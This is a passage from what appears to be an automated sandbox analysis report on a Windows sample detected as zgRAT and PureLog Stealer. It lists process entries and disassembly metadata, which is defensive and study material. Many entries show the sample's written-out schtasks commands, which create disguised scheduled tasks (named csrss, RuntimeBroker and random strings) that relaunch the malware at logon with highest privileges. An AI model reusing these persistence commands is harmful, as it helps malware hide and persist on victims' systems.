                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate
                                                    Has exited:true

                                                    General

                                                    Target ID:13
                                                    Start time:17:01:57
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe'" /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:14
                                                    Start time:17:01:57
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high
                                                    Has exited:true

                                                    General

                                                    Target ID:15
                                                    Start time:17:01:57
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:16
                                                    Start time:17:01:58
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\windows media player\GrVEPTmsoNTbY.exe'" /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:17
                                                    Start time:17:01:58
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "GrVEPTmsoNTbY" /sc ONLOGON /tr "'C:\Program Files (x86)\windows media player\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:18
                                                    Start time:17:01:58
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\windows media player\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:19
                                                    Start time:17:01:58
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 13 /tr "'C:\Users\user\RuntimeBroker.exe'" /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:20
                                                    Start time:17:01:58
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\user\RuntimeBroker.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:21
                                                    Start time:17:01:58
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\user\RuntimeBroker.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:22
                                                    Start time:17:01:58
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 14 /tr "'C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe'" /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:23
                                                    Start time:17:01:58
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "GrVEPTmsoNTbY" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:24
                                                    Start time:17:01:58
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "GrVEPTmsoNTbYG" /sc MINUTE /mo 11 /tr "'C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:25
                                                    Start time:17:01:58
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "4ra1Fo2Zql4" /sc MINUTE /mo 6 /tr "'C:\Users\user\Desktop\4ra1Fo2Zql.exe'" /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:26
                                                    Start time:17:01:58
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "4ra1Fo2Zql" /sc ONLOGON /tr "'C:\Users\user\Desktop\4ra1Fo2Zql.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:27
                                                    Start time:17:01:58
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\schtasks.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:schtasks.exe /create /tn "4ra1Fo2Zql4" /sc MINUTE /mo 13 /tr "'C:\Users\user\Desktop\4ra1Fo2Zql.exe'" /rl HIGHEST /f
                                                    Imagebase:0x7ff784240000
                                                    File size:235'008 bytes
                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:28
                                                    Start time:17:01:59
                                                    Start date:29/08/2024
                                                    Path:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    Imagebase:0x80000
                                                    File size:1'959'424 bytes
                                                    MD5 hash:1B7D99034E439D9F034C9969F88F7B74
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:29
                                                    Start time:17:01:59
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\IZdub348jc.bat"
                                                    Imagebase:0x7ff663480000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:30
                                                    Start time:17:01:59
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:31
                                                    Start time:17:01:59
                                                    Start date:29/08/2024
                                                    Path:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\Desktop\4ra1Fo2Zql.exe
                                                    Imagebase:0xb70000
                                                    File size:1'959'424 bytes
                                                    MD5 hash:1B7D99034E439D9F034C9969F88F7B74
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:32
                                                    Start time:17:02:00
                                                    Start date:29/08/2024
                                                    Path:C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
                                                    Imagebase:0xb30000
                                                    File size:1'959'424 bytes
                                                    MD5 hash:1B7D99034E439D9F034C9969F88F7B74
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 66%, ReversingLabs
                                                    Has exited:true

                                                    General

                                                    Target ID:33
                                                    Start time:17:02:00
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\chcp.com
                                                    Wow64 process (32bit):false
                                                    Commandline:chcp 65001
                                                    Imagebase:0x7ff75dfd0000
                                                    File size:14'848 bytes
                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:34
                                                    Start time:17:02:00
                                                    Start date:29/08/2024
                                                    Path:C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
                                                    Imagebase:0xa0000
                                                    File size:1'959'424 bytes
                                                    MD5 hash:1B7D99034E439D9F034C9969F88F7B74
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:35
                                                    Start time:17:02:00
                                                    Start date:29/08/2024
                                                    Path:C:\Users\user\RuntimeBroker.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\RuntimeBroker.exe
                                                    Imagebase:0x10000
                                                    File size:1'959'424 bytes
                                                    MD5 hash:1B7D99034E439D9F034C9969F88F7B74
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Users\user\RuntimeBroker.exe, Author: Joe Security
                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Users\user\RuntimeBroker.exe, Author: Joe Security
                                                    Antivirus matches:
                                                    • Detection: 100%, Avira
                                                    • Detection: 100%, Joe Sandbox ML
                                                    • Detection: 66%, ReversingLabs
                                                    Has exited:true

                                                    General

                                                    Target ID:36
                                                    Start time:17:02:00
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\PING.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:ping -n 10 localhost
                                                    Imagebase:0x7ff6c2380000
                                                    File size:22'528 bytes
                                                    MD5 hash:2F46799D79D22AC72C241EC0322B011D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:37
                                                    Start time:17:02:00
                                                    Start date:29/08/2024
                                                    Path:C:\Users\user\RuntimeBroker.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Users\user\RuntimeBroker.exe
                                                    Imagebase:0xf50000
                                                    File size:1'959'424 bytes
                                                    MD5 hash:1B7D99034E439D9F034C9969F88F7B74
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:38
                                                    Start time:17:02:08
                                                    Start date:29/08/2024
                                                    Path:C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Windows Portable Devices\GrVEPTmsoNTbY.exe"
                                                    Imagebase:0xa50000
                                                    File size:1'959'424 bytes
                                                    MD5 hash:1B7D99034E439D9F034C9969F88F7B74
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 66%, ReversingLabs
                                                    Has exited:true

                                                    General

                                                    Target ID:39
                                                    Start time:17:02:09
                                                    Start date:29/08/2024
                                                    Path:C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
                                                    Imagebase:0x400000
                                                    File size:1'959'424 bytes
                                                    MD5 hash:1B7D99034E439D9F034C9969F88F7B74
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:41
                                                    Start time:17:02:11
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\cmd.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\U9jP4iZUUm.bat"
                                                    Imagebase:0x7ff663480000
                                                    File size:289'792 bytes
                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:42
                                                    Start time:17:02:11
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6d64d0000
                                                    File size:862'208 bytes
                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:43
                                                    Start time:17:02:11
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\chcp.com
                                                    Wow64 process (32bit):false
                                                    Commandline:chcp 65001
                                                    Imagebase:0x7ff75dfd0000
                                                    File size:14'848 bytes
                                                    MD5 hash:33395C4732A49065EA72590B14B64F32
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:44
                                                    Start time:17:02:11
                                                    Start date:29/08/2024
                                                    Path:C:\Windows\System32\w32tm.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                    Imagebase:0x7ff76f740000
                                                    File size:108'032 bytes
                                                    MD5 hash:81A82132737224D324A3E8DA993E2FB5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    General

                                                    Target ID:45
                                                    Start time:17:02:16
                                                    Start date:29/08/2024
                                                    Path:C:\Program Files (x86)\MSECache\OfficeKMS\csrss.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files (x86)\msecache\OfficeKMS\csrss.exe"
                                                    Imagebase:0x7d0000
                                                    File size:1'959'424 bytes
                                                    MD5 hash:1B7D99034E439D9F034C9969F88F7B74
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:8.5%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:4
                                                      Total number of Limit Nodes:0
                                                      execution_graph 7929 7ff84925ebc1 7931 7ff84925ebdf 7929->7931 7930 7ff84925ed26 QueryFullProcessImageNameA 7932 7ff84925ed84 7930->7932 7931->7930 7931->7931

                                                      Executed Functions

                                                      Function 00007FF848E60D48 Relevance: 2.8, Strings: 2, Instructions: 263COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 456 7ff848e60d48-7ff848e60d9b call 7ff848e607d8 458 7ff848e60da0-7ff848e60eb9 456->458 473 7ff848e60f08-7ff848e60f1d 458->473 474 7ff848e60ebb-7ff848e60f05 458->474 477 7ff848e60f1f-7ff848e60ff5 473->477 478 7ff848e60f1e 473->478 474->478 482 7ff848e60f07 474->482 486 7ff848e61044-7ff848e61050 477->486 487 7ff848e60ff7-7ff848e6103e 477->487 478->477 482->473 487->486
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 5[_H$<O_^
                                                      • API String ID: 0-4097811043
                                                      • Opcode ID: 94d9bb98a2c71e4b015fc577f930ea84cb015a57518c107098052862070b8405
                                                      • Instruction ID: 84d5b83cfd44038e662f4c40e109f0d7c885f25d575dae9aea2c3affbc3e8588
                                                      • Opcode Fuzzy Hash: 94d9bb98a2c71e4b015fc577f930ea84cb015a57518c107098052862070b8405
                                                      • Instruction Fuzzy Hash: 8591F475D1CA9D8FE789EB2888693A97FE0FB96354F4401BAC049E72D2DB782805C711
                                                      Function 00007FF84925EBC1 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 251COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2091021560.00007FF849250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849250000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff849250000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID: FullImageNameProcessQuery
                                                      • String ID: YjJn$YjJn
                                                      • API String ID: 3578328331-3436082983
                                                      • Opcode ID: 84839c5f0f59901dac8c3336e536c6f7705bfeb47d92d9d21e00a28f9321ff85
                                                      • Instruction ID: 9fb998b54ff0f02e5f96bbdae94758ec432d253a9a3afcc51bf61fbfd873e38b
                                                      • Opcode Fuzzy Hash: 84839c5f0f59901dac8c3336e536c6f7705bfeb47d92d9d21e00a28f9321ff85
                                                      • Instruction Fuzzy Hash: C171B430518A8C8FEBA8EF28D8597F977D1FB59311F04427EE85EC7292CB7498418B81
                                                      Function 00007FF848E608D0 Relevance: .1, Instructions: 137COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f130dbebced398342952bd9f99885970a8ad43a7a8c7c3bf3617d91ac7244317
                                                      • Instruction ID: 909d23befbc1a967c565d19c7cd716ad1b5025b287c62e33032dccb1fb6caec6
                                                      • Opcode Fuzzy Hash: f130dbebced398342952bd9f99885970a8ad43a7a8c7c3bf3617d91ac7244317
                                                      • Instruction Fuzzy Hash: A0416C56E4D9A62EE309B37CA0992FC6B80FF85365F1844BBD04CC71D3DE18B8818698
                                                      Function 00007FF848E60998 Relevance: .1, Instructions: 123COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1f7a86290bde4fcab3adc58092d336542d800d8ed934d617d464b69219892a86
                                                      • Instruction ID: 3b1480f5e362078e59f3df3a3cca966abb6a91dbd3823b0349338d731f204c48
                                                      • Opcode Fuzzy Hash: 1f7a86290bde4fcab3adc58092d336542d800d8ed934d617d464b69219892a86
                                                      • Instruction Fuzzy Hash: 41312420B1CD595FEB98F72C94497787AC2FB99751F8000B9E80EC32D6DE38AC818744
                                                      Function 00007FF848E61171 Relevance: .1, Instructions: 95COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1740e5964ed574b4e15df98175a73166207e5563b6e4f7cb4b81f229f9fe201e
                                                      • Instruction ID: 66554a3a768c68822b6cadbced4fb45136ccd0b3cb1115d2b40877d974115607
                                                      • Opcode Fuzzy Hash: 1740e5964ed574b4e15df98175a73166207e5563b6e4f7cb4b81f229f9fe201e
                                                      • Instruction Fuzzy Hash: 2231903090D69A8FDB46EB28C8599A97BF0FF66340F4805FBC009E71A2DB39A845C751
                                                      Function 00007FF848E60960 Relevance: .1, Instructions: 91COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ad049d28e3901bab209041b4b180f7c304b324fbb8e41a08e9be43cb2ce69720
                                                      • Instruction ID: 043f582e400b931470bba163cfcbbc30e75cac1f9e122ce21ad1a3c3f3754297
                                                      • Opcode Fuzzy Hash: ad049d28e3901bab209041b4b180f7c304b324fbb8e41a08e9be43cb2ce69720
                                                      • Instruction Fuzzy Hash: 51212251E4DD6A3EF75CB27C644A2F82AC1EF487A5F5840BAE40DC31D3CE28BC804698
                                                      Function 00007FF848E62A19 Relevance: .1, Instructions: 86COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 74a5bc95528279d0bf9efaf27905a9ea30d52b67ed0fbb62744051dd28b87582
                                                      • Instruction ID: 46013800c90834bb859a11db80516c945551bd244e4f492b285ca7f6029c2a4c
                                                      • Opcode Fuzzy Hash: 74a5bc95528279d0bf9efaf27905a9ea30d52b67ed0fbb62744051dd28b87582
                                                      • Instruction Fuzzy Hash: 66216021E0C91A4FEAA4FA2884587B822D2FF94390F9446B6D40DF32D3DF78BC408749
                                                      Function 00007FF848E60C25 Relevance: .1, Instructions: 79COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 555b1570785daf45f700b10470d1c5b8f7302813699dcd4c8a5786c00b27ae3b
                                                      • Instruction ID: 56daab4497b0df9df6662c56ab1f2ba5662a3e6b39d9233cec22992bbb236252
                                                      • Opcode Fuzzy Hash: 555b1570785daf45f700b10470d1c5b8f7302813699dcd4c8a5786c00b27ae3b
                                                      • Instruction Fuzzy Hash: FF21D331A0D6999FE711FB28C4452EC7FA0FF42360F5445B6C044EB1C2DB3829898755
                                                      Function 00007FF848E63D85 Relevance: .1, Instructions: 54COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3717bf4a10b8c44bd3b5c896091332c6c9a2c5c487670d0cdc94ec844087171
                                                      • Instruction ID: 8d1d280071f9c7f810602afe1cac7332339068cda106b90908dfdd7ac3c2d536
                                                      • Opcode Fuzzy Hash: a3717bf4a10b8c44bd3b5c896091332c6c9a2c5c487670d0cdc94ec844087171
                                                      • Instruction Fuzzy Hash: 2A11EC70D08A198FDB94EB09C894BA973E1FB58315F5441BAD40EE7290CB34AEC5CF85
                                                      Function 00007FF848E60C38 Relevance: .1, Instructions: 53COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2087971967.00007FF848E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E60000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7ff848e60000_4ra1Fo2Zql.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 893427cabd90b9adc6bb90f9f073489abb9a61f46fa982472e1b64fda8483e5f
                                                      • Instruction ID: 17694e1a09c135b95e7514d67183e2b7774c3c39c66e6200dfe7267fae4a3ed7
                                                      • Opcode Fuzzy Hash: 893427cabd90b9adc6bb90f9f073489abb9a61f46fa982472e1b64fda8483e5f
